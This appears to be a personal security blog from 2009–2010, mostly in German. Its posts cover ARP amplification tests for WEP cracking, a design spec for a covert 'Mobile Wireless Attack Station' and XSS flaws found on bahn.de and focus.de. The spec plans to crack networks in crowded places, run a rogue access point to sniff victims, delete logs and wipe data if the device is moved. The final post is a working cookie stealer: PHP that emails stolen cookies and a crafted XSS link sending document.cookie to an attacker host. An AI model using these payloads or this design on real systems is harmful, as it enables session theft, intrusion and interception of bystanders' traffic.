Proof-Of-Concept

ARP Amplification Scenario Testfiles

writemecas — Tue, 23 Mar 2010 16:07:39 +0000

As you may have read a few post under here i did a test on arp amplification – now you can download my testfiles and analyze them on your own. There are captures, notes (german), created arp packets and so on…

You may download the file from here (210MB): LINK

iMWAS: Erstes Video zum Mailversand

writemecas — Sat, 13 Mar 2010 13:21:27 +0000

Nachdem Akkucheckd nun endlich wie gewünscht Funktioniert habe ich ein erstes kleines Video zum Mailversand nach unterschreiten der Mindestrestkapazität gemacht. Ein detaillierteres Video zum Schleifenrythmus und dem logischem Interval folgt noch. Leider gibts das File im Moment nur als .ogv, habe gerade recht wenig Zeit.

Hier der Downloadlink bei Rapidshare: http://rapidshare.com/files/362804356/out.ogv.html

iMWAS: akkucheckd

writemecas — Wed, 10 Mar 2010 09:35:42 +0000

Nach einem langen Tag – und einer noch längeren Nacht – habe ich mich dazu entschlossen den akkucheck, der ursprünglich als Patch für acpi gedacht war, als eigenständigen Daemon zu schreiben. akkucheckd liest die acpi-state-datei und extrahiert die Restkapazität in mAh. Unterschreitet diese einen definierten Wert wird eine eMail an den Kontakt gesendet. Dieser Prozess wiederholt sich in einem definierten Interval.

Die drei in der Config anpassbaren Werte:

Minimum Restkapazität
eMail Adresse Kontakt
Interval

Der Daemon wird über die Daemontools gestartet und überwacht.

**UPDATE**

Der Daemon ist nun bis auf das Beenden durch die daemontools fertig. Ein kleines Video wird folgen.

** UPDATE 2**

Im Moment wird eine kleine Änderung durchgeführt: Überwacht wird der Prozess jetzt durch Monit, nichtmehr durch daemontools (supervise). Grund dafür ist die größere Flexibilität und einfachere Struktur von Monit.

Außerdem wird nun das Interval dynamisch angepasst – bedeutet im Klartext:

Wenn: (aktuelle Restkapazität > (minimale Restkapazität+200)) dann erhöhe den Intervalwert

=> Die Restkapazität wird weniger oft überprüft da sie eh noch recht hoch ist

Wenn: (aktuelle Restkapazität < (minimale Restkapazität+200)) dann vermindere den Intervalwert

=> Die Restkapazität wird öfter geprüft da die kritische Grenze bald erreicht ist

Wie versprochen wird noch ein Video folgen.

Überlegungen zu MWAS

writemecas — Mon, 08 Mar 2010 14:41:08 +0000

Airolib-ng kann als Datenbank genutzt werden, muss aber erweitert werden da es sich nur um eine „Lite-DB“ handelt
Manche Funktionen können als Daemon geschrieben werden (z.b. Akkulaufzeit überwachen)
Prozesse (und damit auch unser Programm + Daemons) können mit den Daemon-Tools überwacht werden
Zugrifsschutz über SecurID / Security Token
Verschlüsselung der Kommunikation – auch eMail! (SSL?)
Webinterface
Automatische Übergabe bei genügend IVs/Daten an Cracking-Server
Wichtig: Entscheidung zwischen Korek ChopChop und Fragmentation anhand von Tests!

ARP Amplification Test

writemecas — Sun, 07 Mar 2010 14:38:57 +0000

Der Rahmen

Im Rahmen einiger WLAN-Test bin ich auf die Methode der ARP-Amplification gestoßen.

Im Grunde beschreibt sie das generieren von mehr als einem IV (Initialization Vector) durch aussenden eines bestimmten ARP Pakets. Bisher konnte ein maximum von 3 IVs pro Arp-Request erreicht werden.

Die Idee
Ein ARP-Request ist im Grunde eine gut verständliche Anfrage:

Who has 192.168.1.12 tell 192.168.1.14

Übersetzt: Wer hat 192.168.1.12, sag es 192.168.1.14. Die zuletzt genannte Adresse ist in diesem Fall die Adresse des anfragenden Computers.

Der Auslöser: „An ARP response is sent directly to the host that issued the request“

Die Idee war nun die Adresse des anfragenden Computers auf die Broadcastadresse des Netzwerks zu ändern sodass alle die Antwort erhalten und somit mehr IVs erzeugt werden.

Das Ergebnis

Die Anzahl an Paketen pro Sekunde verändert sich nicht nennenswert (in meinem Test mit insgesamt 3 Clients und 1 AP (2x Linux, 1x XP, 1x Linksys WRT45gl) kam ich auf ca. 1000Pakete/s.

MWAS – WLAN Insecurity Proof of Concept

writemecas — Wed, 03 Mar 2010 17:01:47 +0000

Dieser Blog heisst „Proof of Concept“ – Beweiß eines Konzepts. Und genau diesem werden wir uns nun widmen. Ich stelle euch nun das nächste große Projekt vor: Ein automatisches Wifi Penetration Testing System.

MWAS – Mobile Wireless Attack Station

>> Hardware

MWAS bildet unsere Hardwarebasis. Wir unterscheiden in 2 Kategorien – dem Testaufbau und unserer Finalen Hardware.

iMWAS – Intelligent Mobile Wireless Attack Station

iMWAS ist die Software die zu unserem Zweck programmierte Software. Hier ist anzumerken das unsere Software nicht alle Arbeit übernimmt sondern geschickt mit verschiedenen anderen Programmen (z.B. Aircrack-Suite) interagiert.

Wer will kann sich das ganze „RFC“ durchlesen:

MWAS – Mobile Wireless Attack Station

Ziel:
Aufbau einer in sich mobilen Station die die unten aufgeführen
Funktionen selbstständig ausführen kann.
> Klasse: Automatisches Penetration Testing System
>> Bestehend aus Soft- und Hardware
>>> Das System ist für den Außenbetrieb konzipiert
Einsatzgebiet: Ort mit hoher Bevölkerungsdichte

Funktionen:
- Erkennung von Wireless-Lan-Netzwerken und deren Verschlüsselung
- Penetrieren (Sammeln von IVs) von verschlüsselten Netzwerken
- Speicherung der lokalisierten Netzwerken anhand der ESSID,
BSSID, Signalstärke, Netzwerkschlüssel und geografischen
Position in einer MySQL Datenbank
- Ständiger Remote-Zugriff durch UMTS-Verbindung auf einen
lokalen SSH-Server
- Versand von Statusmeldungen via Email
- Dateiverwaltung von Capture-, xor- und Sonstigen Dateien
- Sniffing in offenen Netzwerken
- Überwachung der verschiedenen „lebenserhaltenden“ Funktionen
(Akku, Dienste, …)
- AP Modus – System bietet sich als AP an und stellt eine
Verbindung über den UMTS Stick her. Dannach kann das System
sniffen
- Panic Mode: Alarmnachricht bei vorher nicht angegündigter
Positionsänderung
- Löschen von Logfiles (Access-Logs, …)
- Verschlüsselung der Daten
- Zugrifsschutz für Unberechtigte

>> WICHTIG: Umstellung des Systems – das System speichert
nur die Dateien, gecrackt wird auf einem
externen Server
<> Trotzdem wird ein Schlüssel für gecrackte Netze
in der Datenbank behalten, damit das System
einem Netz beitreten kann um dort zu sniffen

Umsetzung durch Multithreading:
Da eine vielzahl von Funktionen simultan und stetig ausgeführt
werden müssen kommt Multithreading zum Einsatz.

Hierfür werden die Funktionen in 5 Klassen eingeteilt:
1.) Wireless Modul
2.) Server Modul
3.) Health Modul
4.) Remote Connection Modul
5.) Localization Modul

Die Klassen sind wiederrum Teil der 3 Komponenten:
1.) Wireless Component { Wireless Modul }
2.) Server Component { Server Modul; Health Modul; Localization Modul }
3.) Remote Component { Remote Connection Modul }

Hardwareanforderungen:
- CPU muss Multithreading unterstützen
- Wireless-Lan-Adapter muss „Promiscious Mode“ unterstützen
- Genügend Festplattenspeicher (geschätzer Wert: 20GB)
- Ausreichend Arbeitsspeicher (geschätzer Wert: min. 512MB)
- Verstärkerantenne mit ausreichend Sendeleistung
- Möglichst klein und mobil
- Lange Akkulaufzeit
- Sparsamer Energieverbrauch

Basisablauf:
1.) Das System wird ausgesetzt und beginnt eine Netzverbindung
herzustellen
2.) Das System sendet seine IP-Adresse an eine im Config-File
beschriebene Email-Adresse
3.) Der Client greift auf den durch das System automatisch
gestarteten SSH-Dienst zu und prüft ob iMWAS gestartet wurde
(Mobile Wireless Attack Station i-Software)
4.) iMWAS beginnt die Suche nach Netzwerken und speichert diese
in der Datenbank
5.) iMWAS beginnt mit dem Sammeln der Daten durch airodump-ng
5a.) Erreicht das .cap-File eine entsprechende Größe oder wird
die Festplatte zu voll wird das Sammmeln abgebrochen und eine
Email an den im Config-File definierten Clienten geschickt
6.) Gibt es ein offenes Netz mit verbundenen Clients verbindet
iMWAS sich mit dem Netzwerk und fängt an zu sniffen
7.) Werden keine Netze gefunden geht iMWAS in einen AP-Modus und
bietet sich als Internetzugang via UMTS an. iMWAS snifft dann
die Daten der verbundenen VICs

Erwartungen an MWAS:
1.) Robust
2.) Klein
3.) Hohe Reichweite
4.) Stromsparend
5.) Wasserfest

Erwartungen an iMWAS:
1.) Stabil
2.) Effizient
3.) Zuverlässig
4.) Zugrifsschutz für Unberechtigte

———————————————————————————-

Ressourcenplanung:
1.) Hardware:
Für den Testaufbau ist eine Zeitspanne von 1 Monate angesetzt,
vorrausgesetzt die benötigte Hardware ist vorhanden.

Für den (Um-)Bau der finalen Hardware werden 2 Monate angesetzt.
Das System soll in einem flexiblen, aber auch robusten
Material eingebaut werden. Vorgabe: Keine

2.) Software:
Für die Entwicklung der Software werden folgende Zeitspannen
angesetzt: <1MT = 2 Stunden>
a.) Wireless Modul: 30MT
b.) Server Modul: 10 MT
c.) Health Modul: 10 MT
d.) Remote Connection Modul: 20 MT
e.) Localization Modul: 20 MT
————–
Total: 90MT

3.) Testphase:
Es werden 5 Testläufe unter Realbedingungen durchgeführt.
Sollten dannach Funktionen existieren die nicht in den Test-
läufen aufgerufen wurden werden die Tests verlängert.

Zu evaluierende Faktoren:
- Laufzeit: Sollwert: min. 8h
- Stromverbrauch: Sollwert: unter 20W
- Festplattenplatz: Sollwert: Ausreichend für das sniffen über
die volle Akkulaufzeit
- Signalabdeckung: Sollwert: Radius von min. 500m

———————————————————————————-

Projektkosten:
- Für den Testaufbau wird mit reinen Materialkosten von ca. 650 gerechnet
- Für den Bau der finalen Hardware wird mit zusätzlichen Kosten von
ca. 300 gerechnet
- Geschätze Betriebsskosten pro Monat: ca. 40
> Strom
> UMTS Stick

Einhaltung der Projekteffizienz:
Um das System so performant wie möglich zu machen muss iMWAS mit der höchst
möglichen Effizienz mit den Systemkomponenten zusammenarbeiten.

Ideen:
1.) Setzen/Verwenden von Systemvariablen
2.) „Logische“ zeitliche Intervalle in der Ausführung von Funktionen
Bsp.: Ist der verbrauchte Festplattenplatz seit dem letzten Check
viel angewachsen?
>> Nein: Intervall bis zum nächsten Check vergrößern
>> Ja: Intervall verkleinern
3.) Identifizieren von aktiven Hosts zur Verdreifachung der Paketrate
>> Stichwort: Interactive Packet Replay

———————————————————————————-

Was-Wenn …:
Verschiedene Zustände erfordern verschiedene Reaktionen. Hier soll dargestellt
werden was passiert wenn eine bestimme Situation eintritt.
1.) … keine Verbindung zu Satelliten hergestellt werden kann und somit keine
Lokalisierung möglich ist?
>> Intervall wird erhöht
>> Keine weitere Lösungsmöglichkeiten, Gerät muss nach einer bestimmten
Zeit einfach wieder abgeholt werden
2.) … der UMTS Stick keine Verbindung herstellen kann?
>> Intervall erhöhen
>> Keine weitere Lösungsmöglichkeiten, Gerät muss nach einer bestimmten
Zeit einfach wieder abgeholt werden
3.) … das Lokalisierungsmodul feststellt, dass sich das Gerät unangekündigt
bewegt?
>> Manuelle Prüfung durch Clienten
>> Meldet sich kein Client innerhalb der nächsten 15 Minuten am Server
an werden alle relevanten Daten gelöscht
4.) … kein Netzwerk gefunden wurde?
>> System wird zu einem AP mit Internetverbindung über UMTS und snifft
Daten von den am AP angemeldeten VICs
5.) … der Akku fast leer ist?
>> Email an den in der Config definierten Clienten
6.) … die Festplatte fast voll ist?
>> Email an den in der Config definierten Clienten
7.) … der SSH Dienst nicht verfügbar ist?
>> Warten bis der ServiceCheck von iMWAS dies bemerkt und den Dienst
neustartet

———————————————————————————-

Config:
a.) Intervalle:
- interval_ap_refresh: Definiert die Zeit in Sekunden bis auf neue APs
geprüft wird
- interval_localization_reconnect: Definiert die Zeit in Sekunden bis
wieder versucht wird eine Verbindung zu einem Satelliten herzustellen
- interval_localization_check: Definiert das Intervall zur Abfrage der
aktuellen Position
- interval_umts_reconnect: Definiert die Zeit in Sekunden bis wieder ver-
sucht wird eine Verbindung über den UMTS-Stick herzustellen
- interval_akku_check: Definiert die Zeit in Sekunden bis zur nächsten
Abfrage des Akkustands
- interval_service_check: Definiert die Zeit in Sekunden bis zum nächsten
Alive-Check der Dienste
- interval_hdd_check: Definiert die Zeit in Sekunden bis die Festplatte das
nächste mal auf ihren freien Speicherplatz gecheckt wird
b.) Kontakt:
- email: Definiert die Emailadresse des Clienten
c.) Wireless:
- standard_creation_interface: Definiert das Standart-Interface das von
Airmon-ng in den Monitor-Modus versetzt wird
- standard_interface: Definiert das Interface das von Airmon-ng geschaffen
wurde und von airodump-ng, etc verwendet wird
- min_packets: Definiert die Mindestanzahl an Paketen die pro Netzwerk
abgefangen werden sollen bevor ein anderes Netzwerk analysiert wird
- ap_mode_name: Definiert den Namen des Netzwerks das der AP-Modus erstellt
hat
d.) Server:
- sshd_port: Definiert den Port auf dem der SSH-Dienst lauscht
- db_name: Definiert den MySQL Datenbank Namen
- db_table: Definiert die MySQL Datenbank Tabelle

MWAS – Mobile Wireless Attack Station

Umsetzung durch Multithreading:
Da eine vielzahl von Funktionen simultan und stetig ausgeführt
werden müssen kommt Multithreading zum Einsatz.

Hierfür werden die Funktionen in 5 Klassen eingeteilt:
1.) Wireless Modul
2.) Server Modul
3.) Health Modul
4.) Remote Connection Modul
5.) Localization Modul

Erwartungen an MWAS:
1.) Robust
2.) Klein
3.) Hohe Reichweite
4.) Stromsparend
5.) Wasserfest

Erwartungen an iMWAS:
1.) Stabil
2.) Effizient
3.) Zuverlässig
4.) Zugrifsschutz für Unberechtigte

———————————————————————————-

Ressourcenplanung:
1.) Hardware:
Für den Testaufbau ist eine Zeitspanne von 1 Monate angesetzt,
vorrausgesetzt die benötigte Hardware ist vorhanden.

Für den (Um-)Bau der finalen Hardware werden 2 Monate angesetzt.
Das System soll in einem flexiblen, aber auch robusten
Material eingebaut werden. Vorgabe: Keine

3.) Testphase:
Es werden 5 Testläufe unter Realbedingungen durchgeführt.
Sollten dannach Funktionen existieren die nicht in den Test-
läufen aufgerufen wurden werden die Tests verlängert.

———————————————————————————-

Einhaltung der Projekteffizienz:
Um das System so performant wie möglich zu machen muss iMWAS mit der höchst
möglichen Effizienz mit den Systemkomponenten zusammenarbeiten.

———————————————————————————-

Folgeprojekte:
- Live-Stream Capturing über UMTS
- Controlpanel
- Hardware Upgrade
- Quattrocopter
- Bluetooth Sniffing
- Active Exploitation
- Clustering
- „Geschlossenes“ System mit Ladetechnik wie z.b. Powermat / Docking Station

———————————————————————————-

[ Presentation ] Introduction to Covert Channeling

writemecas — Mon, 28 Dec 2009 14:29:11 +0000

Quick presentation on covert channeling:

http://docs.google.com/present/edit?id=0AeGb_YxL2qxoZGZyd3BnOG5fMGdybTdzMmhx&hl=en

Nmap Output Filter

writemecas — Mon, 27 Apr 2009 19:51:21 +0000

If you ever scanned a network range for Port 80, you may have received huge logfiles where you have to laboriously pick out the online hosts.

For example i did the following scan:

nmap -sV -p 80 -iL online_host_list > list_only_port80

Maybe not the most beautiful script, but its doing its job.

Bahn.de XSS Vulnerability

writemecas — Thu, 12 Mar 2009 12:06:24 +0000

I recently discovered a XSS flaw on www.bahn.de. I was interested in the time it would take for them to find it on their own. So today i took a quick look and what can i say – they finally fixed it. The flaw was found on 14th february 2k9.

Since it is fixed now, i took a screenshot one day after i found it. Click on the image to see it in it’s real size:

The injected code:

„>

Focus.de XSS Vulnerability – Cookie Stealer Example

writemecas — Sat, 14 Feb 2009 18:51:50 +0000

After a long time without updates here’s a little special for you.

Focus.de XSS Vulnerability

Focus.de is using a searchbox without filtering the input. This leads to a very (!!) simple XSS Injection.

Here’s a little table of the input and the output:

Input: test Output: value=“test“

Input: „test Output:value=“"test“

Now that we successfully broke out of syntax we can have some fun. In this example i’m going to show you how to do your own simple cookie stealer.

IMPORTANT: THIS IS FOR LEARNING ONLY. DO NOT DO THIS ON OTHER PERSONS THAN YOURSELF. I AM NOT RESPONSIBLE FOR YOUR ACTIONS OR RESULTING CONSEQUENCES.

First we need to code a simple php site that collects the given cookies and alerts you via email (in this case i am using eMail notification, but it’s only one of much more options).

This is my collect.php

$p=$HTTP_GET_VARS["param"];

$Name = „email_alert“;

$email = „email_alert@cookie_stealer“;

$recipient = „writemecas@googlemail.com“;

$mail_body = „A new cookie has been logged: \n“.$p;

$subject = „New Cookie Alert“;

$header = „From: „. $Name . “ <“ . $email . „>\r\n“;

mail($recipient, $subject, $mail_body, $header);

Header(„Location: http://www.focus.de“);

exit();

?>

Some may ask why i am not using this:

Header(„Location: $HTTP_REFERER“);

Simply because it would lead to a loop. For a better understanding lets follow the flow if we use our normal redirection:

User clicks on the malicious link -> User gets forwarded to our malicious site -> User gets forwarded to focus.de

Now we can have a look at the flow if we use the $HTTP_REFERER option:

User clicks on the malicious link -> User gets forwarded to our malicious site -> User gets forwarded to the original malicious link

So the problem is that the user always gets back to our malicious link and the loop starts again.

Basically that’s all we need. This is how my encrypted malicious link looks like:

http://www.focus.de/service/suche?q=%22%3Cscript%3Edocument.location

%3D%22http%3A%2F%2FtYOUR_HOST%2Fcollect.php%3Fparam

%3D%22%2Bdocument.cookie%3C%2Fscript%3E&searchscope=

http%3A%2F%2Fwww.focus.de%2Fservice%2Fsuche&x=14&y=

7&entqr=3&getfields=image_for_search.date.obj

_type_gsa&entsp=a&sort=dt&hl=en

AGAIN: THIS IS FOR TRAINING PURPOSES, DO NOT USE IT TO STEAL COOKIES OF SOMEONE ELSE!